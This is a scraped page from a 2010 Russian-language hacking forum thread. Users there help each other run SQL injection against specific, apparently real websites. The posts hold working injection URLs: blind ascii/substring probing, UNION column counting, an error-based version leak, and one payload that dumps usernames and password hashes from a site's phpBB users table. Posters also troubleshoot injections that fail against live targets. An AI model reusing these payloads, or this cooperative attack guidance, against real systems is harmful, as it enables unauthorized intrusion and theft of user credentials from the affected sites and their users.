ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.08.2010, 13:00
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Koren
Koren said:
blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))> 115
долго очень перебирать имя юзера, можно ли через sipt
ускорить перебор? каков должен быть запрос в сипт?
(user(),{N1-115},1 или ?????
user()
|
|
|
14.08.2010, 22:52
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791
Репутация:
6
|
|
Подскажите плиз как в этой скуле узнать кол-во полей
Сообщение от None
http://www.globalresponse.org/gra.php?i=current')+Union+select+1,2,3,4,5--
|
|
|
|
14.08.2010, 22:57
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от InfectedM
InfectedM said:
Подскажите плиз как в этой скуле узнать кол-во полей
http://www.globalresponse.org/gra.php?i=current'+or+(1,1)=(select+count(0),conca t((select+version()+from+information_schema.tables +limit+0,1),floor(rand(0)*2))from(information_sche ma.tables)+group+by+2)--+
|
|
|
|
14.08.2010, 22:59
|
|
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051
Репутация:
133
|
|
Сообщение от InfectedM
InfectedM said:
Подскажите плиз как в этой скуле узнать кол-во полей
Код:
Code:
http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23--+
опередил
А вот похенк)
Код:
Code:
http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,concat_ws%280x3a,username,user_password%29,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23+from+phpbb_users+limit+1,1--+
|
|
|
|
15.08.2010, 15:54
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Подскажите, каким алгоритмом шифруются пасы в redmine?
|
|
|
|
15.08.2010, 18:34
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875
Репутация:
446
|
|
Почему инфу не выводит?
Слепая инъекция...
Код:
Code:
http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
|
|
|
|
15.08.2010, 18:44
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Electr0n
Electr0n said:
Почему инфу не выводит?
Слепая инъекция...
Код:
Code:
http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
_http://www.experienceegypt.info/templates/contactus.php?id=-116+union+select+1,2,version(),4,5,6,7,8,9+--+
|
|
|
|
15.08.2010, 21:48
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
|
|
|
|
15.08.2010, 22:10
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Koren
Koren said:
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
Синтаксис нарушен. Либо скобка не закрыта либо еще что-то. Но ошибка не из-за фильтрации чего либо.
|
|
|
|
16.08.2010, 05:28
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
такой вопрос: видел где то раскручивали скулю на asp?ID=15 поискав немного не нащёл
реально ведь вообще? можно пример привести + хотелось бы увидеть линк на статью по этой теме если есть
так же столкнулся ещё с такой проблемой...
http://www.tall.com/detail.php?itemid=7565&size=454/fuck
иньекция есть, 1 колонка вывод данныех недоступен(
посмотрите плыз
да и по первому вопросу оч нуждаюсь в ответе
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2300305){kind=avatar}
Похожие темы
Линейный вид
